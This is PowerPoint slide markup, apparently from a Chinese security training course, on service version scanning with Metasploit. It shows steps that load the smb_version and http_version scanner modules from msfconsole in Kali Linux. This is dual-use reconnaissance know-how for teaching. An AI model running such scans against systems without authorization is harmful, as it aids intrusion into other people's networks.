              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="文本框 119"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241290" y="1503045"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.使用“exploit”或“run”命令运行smb_version模块，如图2-4-31所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241290" y="2148205"/>
            <a:ext cx="5276850" cy="2085975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="文本框 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5241290" y="4234180"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-31 运行smb_version模块        从扫描结果可以看到，有一台主机安装了SSH服务，服务版本是“windows 2003 SP2”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Http服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="文本框 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249545" y="703897"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1.在Kali Linux终端界面中输入“msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>命令，打开Metasploit框架。使用“search http_version”命令找出http_version模块使用路径，如图2-4-32所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249545" y="1902777"/>
            <a:ext cx="5276850" cy="1628775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="文本框 121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249545" y="3531553"/>
            <a:ext cx="5080000" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-32 搜索http_version模块路径2.输入“use auxiliary/scanner/http/http_version”命令使用http_version扫描模块，这个模块能够扫描Http服务的版本，如图2-4-33所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249545" y="5284787"/>
            <a:ext cx="3800475" cy="600075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="文本框 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249545" y="5884862"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-33 使用http_version扫描模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Http服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
